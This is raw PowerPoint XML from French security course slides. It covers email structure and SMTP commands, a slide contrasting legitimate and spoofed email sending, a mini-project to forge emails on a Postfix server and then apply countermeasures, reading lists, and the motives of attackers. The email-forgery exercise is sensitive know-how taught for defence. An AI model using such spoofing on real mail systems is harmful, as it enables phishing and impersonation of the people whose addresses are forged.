                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Subject</a:t>
            </a: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 Titre du message</a:t>
            </a:r>
            <a:b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b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&gt;Date: May 6th, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2021</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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&gt;Le corps du message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Tableau 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3310848204"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="372463" y="1155943"/>
          <a:ext cx="4190911" cy="2517190"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="411140"/>
                <a:gridCol w="411140"/>
                <a:gridCol w="3368631"/>
              </a:tblGrid>
              <a:tr h="871270">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" smtClean="0"/>
                        <a:t>Format d’un email</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="2000" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>Enveloppe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>MAIL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> FROM: &lt;expediteur@mail.com&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>RCP TO: &lt;recepteur@mail.com&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>En-tête</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>From</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>: </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>To:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Reply</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>-To:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Date:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Subject</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
                        <a:t>Corps</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr vert="vert270" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Monsieur, </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Je viens</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> par la présente ….</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83361" y="3835805"/>
            <a:ext cx="3996934" cy="39076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4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commande SMTP pour envoyer un email sain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524417" y="3835804"/>
            <a:ext cx="4293107" cy="39076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4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Commande SMTP pour envoyer un email usurpé</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7792500" y="2364999"/>
            <a:ext cx="2931571"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fr-FR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Démonstration   &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89500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a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>attaques web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="6853112" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mini projet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Installer le serveur mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Postfix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>  sur une machine Linux server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Utiliser le serveur pour forgé des emails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Appliquer les contremesures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Utiliser les certificats pour assurer le chiffrement des emails. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="4000"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72</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Groupe 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8119614" y="1409071"/>
            <a:ext cx="2895600" cy="3228975"/>
            <a:chOff x="8119614" y="1409071"/>
            <a:chExt cx="2895600" cy="3228975"/>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9614" y="1409071"/>
              <a:ext cx="2895600" cy="3228975"/>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3544" y="3870679"/>
              <a:ext cx="804713" cy="563299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37394244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Références</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du contenu 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="949568"/>
            <a:ext cx="7874977" cy="5838094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CEH v11 Certified Ethical Hacker Study Guide-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sybex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CISSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Official Study Guide-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sybex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Tout sur la sécurité informatique-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Dunod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer Security Principles and Practice-Pearson Education Limited (2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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4126" y="304549"/>
            <a:ext cx="1154502" cy="1448078"/>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4126" y="1855660"/>
            <a:ext cx="1198914" cy="1502639"/>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4126" y="3424486"/>
            <a:ext cx="1259093" cy="1742829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imag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4126" y="5251964"/>
            <a:ext cx="1288144" cy="1679513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37237688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Références</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="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74</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du contenu 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="949568"/>
            <a:ext cx="7874977" cy="5838094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Sécurité informatique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Hacking, apprendre l’attaque pour mieux se défendre (2011)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Social Engineering The Art of Human Hacking-Wiley (2010)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="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3128" y="344732"/>
            <a:ext cx="1803708" cy="2157546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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174" y="2770348"/>
            <a:ext cx="1467615" cy="2196533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3463147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Les motivations / objectifs des attaques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="1306286"/>
            <a:ext cx="11390812" cy="5384073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectifs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Désinformer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Empêcher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l'accès à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>une ressource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Prendre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>le contrôle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d'une ressource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Récupérer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>l'information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utiliser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>système compromis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>pour attaquer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>un autre (rebondir)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Motivations</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Vengeance/rancune</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Politique/religion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Défis intellectuels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Envie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de nuire aux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>autres</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Impressionner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>autres</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Vol d’information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Désir d’argent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Falsification d’information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
